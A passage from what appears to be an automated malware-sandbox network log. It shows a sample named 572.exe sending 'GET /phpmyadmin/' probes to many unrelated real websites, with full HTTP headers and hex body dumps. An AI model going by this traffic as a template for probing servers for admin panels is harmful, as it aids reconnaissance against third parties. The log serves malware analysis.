https://*.snap.com https://*.snapchat.com https://*.snap-dev.net https://*.sc-corp.net https://localhost:3000; frame-ancestors https://iframe.arkoselabs.com https://profile.softserve-local-prod.snap-dev.net https://preproduction-dot-snap-profile-manager.snapchat.com https://hotfix-dot-snap-profile-manager.snapchat.com https://snap-profile-manager.snapchat.com https://profile-preprod.snapchat.com https://business-preprod.snapchat.com https://profile.snapchat.com https://business.snapchat.com https://enterprise.snap.com;
                                                                                                                                                                                                                                                                                                                                                                x-content-security-policy: default-src 'self'; script-src 'self' 'sha256-93ejg12EAT+6aW5hUFXASC0su+RZ+zOjgnJgLqJaLmY=' https://sc-static.net https://www.google-analytics.com https://www.googletagmanager.com https://snap-api.arkoselabs.com/ https://www.google.com/recaptcha/ https://www.google.com/js https://www.gstatic.com/ https://apis.google.com/ https://tr.snapchat.com/config/com/49966cac-c23c-49c7-9ff9-c7f8f6f771ba.js; font-src 'self' https://snapnet-cdn.storage.googleapis.com *.sc-cdn.net data:; style-src 'self' 'unsafe-inline' https://snapnet-cdn.storage.googleapis.com *.sc-cdn.net blob:; frame-src 'self' https://iframe.arkoselabs.com https://snap-api.arkoselabs.com https://tr.snapchat.com https://www.google.com/ https://client-api.arkoselabs.com/; connect-src 'self' https://graphql.contentful.com/content/v1/spaces/kp51zybwznx4/environments/master https://snap-api.arkoselabs.com/ https://tr.snapchat.com https://www.snapchat.com https://accounts.snapchat.com https://web-frontend-dot-sc-analytics.appspot.com https://us-central1-gcp.api.snapchat.com https://staging-us-central1-gcp.api.snapchat.com https://www.google-analytics.com https://sentry.sc-prod.net https://cdn.contentful.com/spaces/kp51zybwznx4/ https://accounts.snap.com/ https://web.snapchat.com/ https://gcp.api.snapchat.com https://story.snapchat.com https://aws.api.snapchat.com/snapchat.cdp.cof.CircumstancesService/targetingQuery https://aws.api.snapchat.com/snapchat.ab.exposure_service.ExposureService/BatchUpdateAbExposure https://chat-gold.sc-corp.net; img-src 'self' data: https://ssl.gstatic.com https://www.snapchat.com https://sc-oauth2-client-icons-dev.storage.googleapis.com https://sc-oauth2-client-icons.storage.googleapis.com https://storage.googleapis.com https://www.google-analytics.com https://images.ctfassets.net https://sdk.bitmoji.com; media-src 'self' https://storage.googleapis.com; form-action 'self' https://*.snap.com https://*.snapchat.com https://*.snap-dev.net https://*.sc-corp.net https://localhost:3000; frame-ancestors https://iframe.arkoselabs.com https://profile.softserve-local-prod.snap-dev.net https://preproduction-dot-snap-profile-manager.snapchat.com https://hotfix-dot-snap-profile-manager.snapchat.com https://snap-profile-manager.snapchat.com https://profile-preprod.snapchat.com https://business-preprod.snapchat.com https://profile.snapchat.com https://business.snapchat.com https://enterprise.snap.com;
                                                                                                                                                                                                                                                                                                                                                                x-cloud-trace-context: 8f3ded58776f87a4179fa6d2f1064780
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:14:53 GMT
                                                                                                                                                                                                                                                                                                                                                                server: API Gateway
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 664
                                                                                                                                                                                                                                                                                                                                                                via: 1.1 google, 1.1 google
                                                                                                                                                                                                                                                                                                                                                                alt-svc: clear
                                                                                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC664INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6f 72 69 67 69 6e 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 65 2d 69 74 75 6e 65 73 2d 61 70 70 22 20 63 6f 6e 74 65 6e 74 3d 22 61 70 70 2d 69 64 3d 34 34 37 31 38 38 33 37 30 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 26 62
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en"><head><meta charset="utf-8"><meta name="referrer" content="origin"><meta name="apple-itunes-app" content="app-id=447188370"><title>404 &b


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                84192.168.2.655530163.247.44.239443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC186OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: mitextoescolar.mineduc.cl
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC240INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:14:53 GMT
                                                                                                                                                                                                                                                                                                                                                                location: http://mitextoescolar.mineduc.cl/phpmyadmin
                                                                                                                                                                                                                                                                                                                                                                content-length: 251
                                                                                                                                                                                                                                                                                                                                                                content-type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                connection: close
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC251INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6d 69 74 65 78 74 6f 65 73 63 6f 6c 61 72 2e 6d 69 6e 65 64 75 63 2e 63 6c 2f 70 68 70 6d 79 61 64 6d 69 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://mitextoescolar.mineduc.cl/phpmyadmin">here</a>.</p></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                85192.168.2.65518631.216.144.5443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC168OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: mega.nz
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC887INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Headers: MEGA-Chrome-Antileak
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Max-Age: 86400
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 2709
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: geoip=RO
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: default-src 'self' data: blob: *.mega.co.nz *.mega.nz *.mega.io http://*.mega.co.nz http://*.mega.nz http://*.mega.io wss://*.karere.mega.nz wss://*.sfu.mega.co.nz *.karere.mega.nz:1380 http://127.0.0.1:6341 localhost.megasyncloopback.mega.nz:6342; script-src 'self' *.mega.co.nz *.mega.nz *.mega.io data: blob:; style-src 'self' 'unsafe-inline' *.mega.co.nz *.mega.nz *.mega.io data: blob:; frame-src 'self' *.megapay.nz mega: *.megaad.nz https://mega.nz/ https://mega.io/; img-src 'self' *.mega.co.nz *.mega.nz *.mega.io data: blob: mega.nz
                                                                                                                                                                                                                                                                                                                                                                Connection: Close
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC2709INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 4d 45 47 41 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 45 47 41 20 70 72 6f 76 69 64 65 73 20 66 72 65 65 20 63 6c 6f 75 64 20 73 74 6f 72 61 67 65 20 77 69 74 68 20 63 6f 6e 76 65 6e 69 65 6e 74 20 61 6e 64 20 70 6f 77 65 72 66 75 6c 20 61 6c 77 61 79 73 2d 6f 6e 20 70 72 69 76 61 63 79 2e 20 43 6c 61 69 6d 20 79 6f 75 72 20 66 72 65 65 20 32 30 47 42 20 6e 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml"><head><title>MEGA</title><meta name="description" content="MEGA provides free cloud storage with convenient and powerful always-on privacy. Claim your free 20GB now" /><meta property="og:title


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                86192.168.2.654855104.26.14.180443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC186OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: aeaaamorim.inovarmais.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC546INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:53 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=j1NQmeDGwT4WqqDTUDXGAhu0PP9D2Tbo1BhthUi5TUJJtjCmuK3djBde99Qv3hTQe7eR3W0ruJQa47TqPxHETmSKhhpYhRq%2Fa7WKjrk5sZQzg%2Bo5DQ4lsSVH9R4K4TNQOGcd05L9dzeU54s%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb7a6d1d672f-ATL
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC823INData Raw: 34 64 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 4dd<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC429INData Raw: 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ound:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                87192.168.2.655259186.113.7.204443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC188OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: oferta.senasofiaplus.edu.co
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC910INHTTP/1.1 404 No Encontrado
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1002
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:53 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: BIGipServerPOOL_SOFIA_OFERTA_PDN_8680=3809615276.59425.0000; path=/; Httponly; Secure
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: dcid=1707131693229-35664204; Expires=Sun, 05-May-2024 11:14:53 GMT
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: pvid=1707131693229-8280750; Expires=Mon, 05-Feb-2024 11:19:53 GMT
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: f5avraaaaaaaaaaaaaaaa_session_=OJDACIMGHJANEMICHILKMLOJHDABJCLAEKBPOKBGNBJKPHFHNHPGAHIMLGNAKOMJCAIDINOPCCMPDBMLGGFAAKEHOMFBCJLCPNNNIODFANAPEFLDMGLNODKKKHLEGHGH; HttpOnly; secure
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: TS0130ba83=01fd6418eb37e70eabaa48eafcbbb0dcaf0d1abf2b607d121b459cdbd79986f75f9a348d31af9d05f863064728c61f1cff7017447ae39131cf689c17efee63f12f5b4bcf4d83fac84514dbd83d4fe1eafc53a6a52744fc0c4bc0f24f6b1ae5fa6444490a0105b51d2e22d2bc66c0797e15ea72f5e9; Path=/; Domain=.oferta.senasofiaplus.edu.co; HTTPOnly
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC1002INData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 42 6f 73 73 20 57 65 62 2f 37 2e 30 2e 31 30 2e 46 69 6e 61 6c 20 2d 20 49 6e 66 6f 72 6d 65 20 64 65 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>JBoss Web/7.0.10.Final - Informe de Error</title><style>...H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                88192.168.2.655189184.25.164.103443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC183OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: store.steampowered.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC233INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Location: https://store.steampowered.com/
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=10368000
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:53 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: close


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                89192.168.2.655001104.21.34.34443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC175OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: virtuadopt.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC1203INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:53 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=m1df5tcc91m83fp9jkoskfk3al; path=/
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: va_live_cookie_u=1; expires=Tue, 04-Feb-2025 11:14:53 GMT; path=/; domain=.virtuadopt.com; secure; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: va_live_cookie_k=; expires=Tue, 04-Feb-2025 11:14:53 GMT; path=/; domain=.virtuadopt.com; secure; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: va_live_cookie_sid=749f64b88f63aa65f0d1360333e5ca8d; expires=Tue, 04-Feb-2025 11:14:53 GMT; path=/; domain=.virtuadopt.com; secure; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Location: https://virtuadopt.com/phpmyadmin
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WxHf79uuS2v%2FQSn9wQK7Eq4DZm8JywqNlILRdL%2FJm03l9bW1P6DW%2F8N23rV793kjTrFzCotEL4TCdcQr8hZn1fPSa7SDeT2%2FB8ZRh957lNEwq5kJMRmIyyRknA6%2BcqTu8Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb7a7bbf675d-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                90192.168.2.655276170.114.52.2443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC174OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: gitam.zoom.us
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC1301INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:53 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                x-zm-trackingid: v=2.0;clid=aw1;rid=WEB_2f7cfeb0ef566b5f9fe64326c5eb5852
                                                                                                                                                                                                                                                                                                                                                                x-content-type-options: nosniff
                                                                                                                                                                                                                                                                                                                                                                content-security-policy: upgrade-insecure-requests; default-src https://*.zoom.us https://zoom.us blob: 'self'; img-src https: about: blob: data: 'self'; style-src https: safari-extension: chrome-extension: 'unsafe-inline' data: 'self'; font-src https: safari-extension: chrome-extension: blob: data: 'self'; connect-src * about: blob: data: 'self'; media-src * rtmp: blob: data: 'self'; frame-src https: ms-appx-web: zoommtg: zoomus: wvjbscheme: zoomprc: data: blob: 'self'; object-src 'none'; base-uri 'none';script-src 'self' 'strict-dynamic' 'nonce-iHeF8ClCSkGydn8_YmnXmA' 'unsafe-inline' blob: https:;
                                                                                                                                                                                                                                                                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                set-cookie: zm_aid=; Max-Age=0; Expires=Thu, 01 Jan 1970 00:00:10 GMT; Domain=zoom.us; Path=/; Secure; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                x-zm-zoneid: VA
                                                                                                                                                                                                                                                                                                                                                                content-language: en-US
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: zm_haid=; Max-Age=0; Expires=Thu, 01 Jan 1970 00:00:10 GMT; Domain=zoom.us; Path=/; Secure; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: zm_tmaid=; Max-Age=0; Expires=Thu, 01 Jan 1970 00:00:10 GMT; Domain=zoom.us; Path=/; Secure; HttpOnly
